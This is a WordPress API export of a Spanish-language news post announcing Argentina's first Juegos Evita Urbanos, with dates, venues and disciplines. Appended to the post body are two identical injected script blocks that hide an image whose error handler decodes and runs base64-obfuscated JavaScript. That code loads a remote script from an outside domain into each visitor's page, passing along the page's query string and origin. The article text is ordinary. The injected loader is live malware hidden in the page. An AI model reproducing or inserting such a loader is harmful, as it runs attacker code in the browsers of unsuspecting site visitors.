{"id":2945,"date":"2023-08-03T09:20:03","date_gmt":"2023-08-03T12:20:03","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2945"},"modified":"2025-08-14T00:11:16","modified_gmt":"2025-08-14T03:11:16","slug":"se-viene-el-debut-de-los-juegos-evita-urbanos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2945","title":{"rendered":"\u00a1Se viene el debut de los Juegos Evita Urbanos!"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>La competencia se llevar\u00e1 a cabo del 23 al 27 de agosto en Tecn\u00f3polis.<\/em><\/h4>\n\n\n\n<p>Pasaron los&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/noticias\/final-puro-sol-para-los-juegos-evita-de-playa\" target=\"_blank\" rel=\"noopener\" title=\"\">Juegos Evita de Playa<\/a>&nbsp;en marzo (miles de pibas y pibas brillaron y se divirtieron en las playas de las refaccionadas Unidades Tur\u00edsticas de Chapadmalal) y ahora&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/juegosevita\/juegos-nacionales-evita-urbanos\" target=\"_blank\" rel=\"noopener\" title=\"\">es el turno de los Juegos Urbanos<\/a>, que se desarrollar\u00e1n&nbsp;<strong>por primera vez en la historia<\/strong>.<\/p>\n\n\n\n<p>Ser\u00e1n&nbsp;<strong>1400 participantes<\/strong>, de las&nbsp;<strong>24 jurisdicciones del pa\u00eds<\/strong>, quienes mostrar\u00e1n sus destrezas en&nbsp;<strong>ocho disciplinas<\/strong>: B\u00e1squet 3&#215;3, Breaking, Freestyle, Escalada, Skate, Parkour, Freestyle y Ajedrez.<\/p>\n\n\n\n<p>Los&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/juegosevita\" target=\"_blank\" rel=\"noopener\" title=\"\">Juegos Evita<\/a>, que este a\u00f1o cumplen 75 a\u00f1os, continuar\u00e1n con los&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/juegosevita\/juegos-nacionales-evita-personas-mayores\" target=\"_blank\" rel=\"noopener\" title=\"\">Juegos para Personas Mayores<\/a>&nbsp;(8 al 12 de septiembre en Termas de R\u00edo Hondo, provincia de Santiago del Estero) y, claro, el mega evento principal: las Finales Nacionales de&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/juegosevita\/juegos-nacionales-evita-juveniles\" target=\"_blank\" rel=\"noopener\" title=\"\">Juveniles<\/a>&nbsp;y&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/juegosevita\/juegos-nacionales-evita-adaptado\" target=\"_blank\" rel=\"noopener\" title=\"\">Adaptados<\/a>, que se disputar\u00e1n del 25 al 30 de septiembre en Mar del Plata.<\/p>\n\n\n\n<p>Encontr\u00e1 m\u00e1s informaci\u00f3n en&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/juegosevita\" target=\"_blank\" rel=\"noopener\" title=\"\">juegosevita.gob.ar<\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La competencia se llevar\u00e1 a cabo del 23 al 27 de agosto en Tecn\u00f3polis. Pasaron los&nbsp;Juegos Evita de Playa&nbsp;en marzo (miles de pibas y pibas brillaron y se divirtieron en las playas de las refaccionadas Unidades Tur\u00edsticas de Chapadmalal) y ahora&nbsp;es el turno de los Juegos Urbanos, que se desarrollar\u00e1n&nbsp;por primera vez en la historia. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2946,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-2945","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2945"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2945"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2945\/revisions"}],"predecessor-version":[{"id":7004,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2945\/revisions\/7004"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2946"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2945"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2945"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2945"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}